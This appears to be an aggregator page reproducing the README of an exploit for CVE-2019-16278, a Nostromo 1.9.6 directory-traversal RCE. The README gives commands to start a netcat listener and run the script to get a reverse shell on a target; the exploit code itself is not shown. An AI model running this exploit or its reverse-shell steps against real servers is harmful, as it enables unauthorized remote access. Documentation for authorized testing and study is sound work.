关联漏洞
描述
This repository contains an exploit for CVE-2019-16278 in Nostromo Web Server 1.9.6, allowing remote code execution via a directory traversal vulnerability. The script uses pwntools to establish a reverse shell. For educational and authorized testing use only.
介绍
# CVE-2019-16278-Nostromo-1.9.6-RCE
This repository contains an exploit for CVE-2019-16278 in Nostromo Web Server 1.9.6, allowing remote code execution via a directory traversal vulnerability. The script uses pwntools to establish a reverse shell. For educational and authorized testing use only.
## Requirements
- **Python 3.x**
- **pwntools** library
To install `pwntools`, use:
```bash
pip3 install pwntools
```
## Usage
### Setup
1. **Start a Listener**: On the attacking machine, start a listener on the specified port to receive the reverse shell:
```bash
nc -lvnp <attacker-port>
```
2. **Run the Script**: Use the following command to execute the exploit script. Replace the values as needed.
```bash
python3 exploit.py --attacker-ip <attacker-ip> --attacker-port <attacker-port> [-t target-ip] [-p target-port]
```
### Example
```bash
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80
```
In this example:
- `--attacker-ip 10.10.14.15` is the IP address of the attacking machine.
- `--attacker-port 4444` is the port on which the attacking machine is listening for the reverse shell.
- `-t 10.10.10.165` specifies the target IP (default is `10.10.10.165`).
- `-p 80` specifies the target port (default is `80`).
### Script Options
| Option | Description | Default |
|-------------------|------------------------------------------------------|-----------------|
| `-t, --target` | IP address of the remote host | 10.10.10.165 |
| `-p, --port` | Port on the remote host to target | 80 |
| `--attacker-ip` | IP address of the attacking machine for the reverse shell | None (required) |
| `--attacker-port` | Port on the attacking machine for the reverse shell | None (required) |
### Script Flow
1. **Warning Message**: Reminds the user to start a listener on the attacking machine.
2. **Payload Construction**: Builds an HTTP request with the reverse shell command using netcat (`nc`).
3. **Payload Execution**: Sends the payload to the target server and attempts to receive a reverse shell.
4. **Retries**: If the initial attempt fails, the script retries up to 3 times with feedback on each attempt.
### Code Flow Example
If successful, you should receive a reverse shell on your listener with access to the target system.
## Disclaimer
This script is intended for educational purposes and authorized testing only. Unauthorized access to computer systems is illegal. The author and contributors are not responsible for any misuse or damage caused by this tool. Use it responsibly and only on systems you have permission to test.
文件快照
[4.0K] /data/pocs/c2faf57084fd3739c206aa29c08168ebd007f1d5
├── [2.6K] poc.py
├── [2.7K] README.md
└── [ 16] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。